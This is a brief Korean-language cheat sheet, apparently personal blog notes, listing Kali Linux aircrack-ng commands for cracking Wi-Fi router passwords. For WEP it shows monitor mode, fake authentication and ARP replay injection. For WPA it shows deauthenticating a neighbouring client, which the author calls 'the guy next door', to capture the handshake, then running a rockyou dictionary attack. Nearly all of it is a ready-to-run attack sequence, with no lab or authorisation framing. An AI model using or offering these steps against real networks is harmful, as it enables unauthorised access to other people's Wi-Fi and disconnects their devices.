무선 공유기 패스워드 …
무슨 내용인지 하나로 모르지만 일단 정리…(타이핑은 시골집 고양이가 수행함)
Kali Linux에서 진행
AP MAC 90:9F:33:XX:XX:XX
Client MAC 64:6E:69:XX:XX:XX
기본 도구들
- iwconfig
- iw phy0 info
- iwlist channel
WEP의 경우
1. 모니터 모드 시작 & AP 덤프
airmon-ng start wlan0
airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon
airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon
2. 데이터를 생성 하기 위해 인증 시도
aireplay-ng -1 5000 -e SSID -a 90:9F:33:XX:XX:XX -h 64:6E:69:XX:XX:XX wlan0mon
3. ARP Injection으로 Data 강제 유발
aireplay-ng -3 -b 90:9F:33:XX:XX:XX -h 64:6E:69:XX:XX:XX wlan0mon
4. IVS 값을 어느정도 수집하게 되면 크*
aircrack-ng wepcrack.cap
WPA의 경우
1. 모니터 모드 시작 & AP 덤프
airmon-ng start wlan0
airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon
airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon
2. 옆에 놈 연결을 끊어서 EAPOL 노출
aireplay-ng -0 10 -a 90:9F:33:XX:XX:XX -c 64:6E:69:XX:XX:XX wlan0mon
3. CAP 파일에서 사전공격으로 패스워드 추출
aircrack-ng -b 90:9F:33:XX:XX:XX -w /usr/share/wordlists/rockyou.txt wifi-01.cap